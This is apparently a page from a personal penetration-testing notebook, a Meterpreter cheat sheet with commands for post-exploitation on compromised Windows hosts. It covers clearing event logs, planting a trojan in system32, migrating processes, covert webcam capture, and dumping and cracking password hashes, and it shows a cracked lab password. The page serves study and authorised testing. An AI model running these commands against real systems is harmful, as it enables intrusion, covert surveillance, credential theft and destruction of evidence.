refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • navigating
  • shell
  • Clear app,sys,security logs on windows
  • download/upload
  • Migrate to process
  • Run commands in script
  • Search files
  • Web Cam
  • John The Ripper
  • Netcat connect

Was this helpful?

  1. Metasploit

Meterpreter

navigating

#Meterpreter commands
meterpreter > background
meterpreter > cat edit.txt
meterpreter > cd c:\windows
meterpreter > ls
meterpreter > lpwd
meterpreter > lcd MSFU

shell

meterpreter > shell

Clear app,sys,security logs on windows

meterpreter > clearev

download/upload

meterpreter > download c:\\boot.ini
meterpreter > upload evil_trojan.exe c:\\windows\\system32

Migrate to process

meterpreter > run post/windows/manage/migrate 
meterpreter > ps
meterpreter > migrate <pid>

Run commands in script

cat resource.txt
ls

background

meterpreter > resource resource.txt
#[*] Reading /root/resource.txt
[*] Running ls
#..
#..
#[*] Backgrounding session 1...

Search files

meterpreter > search -h
meterpreter > search -f *.jpg
meterpreter > search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.p

Web Cam

meterpreter > webcam_list
meterpreter > webcam_snap -h
meterpreter > webcam_snap -i 1 -v false

John The Ripper

msf auxiliary(handler) > use post/windows/gather/hashdump
msf post(hashdump) > set session 1
msf post(hashdump) > run
msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run
#[+] Cracked: Guest: (192.168.184.134:445)

#[+] Cracked: rAWjAW2:password (192.168.184.134:445)

Netcat connect

msf > connect 192.168.1.1 23
meterpreter > search -f autoexec.bat
meterpreter > search -f sea*.bat c:\\xamp\\

PreviousBasic UsageNextPivoting

Last updated 4 years ago

Was this helpful?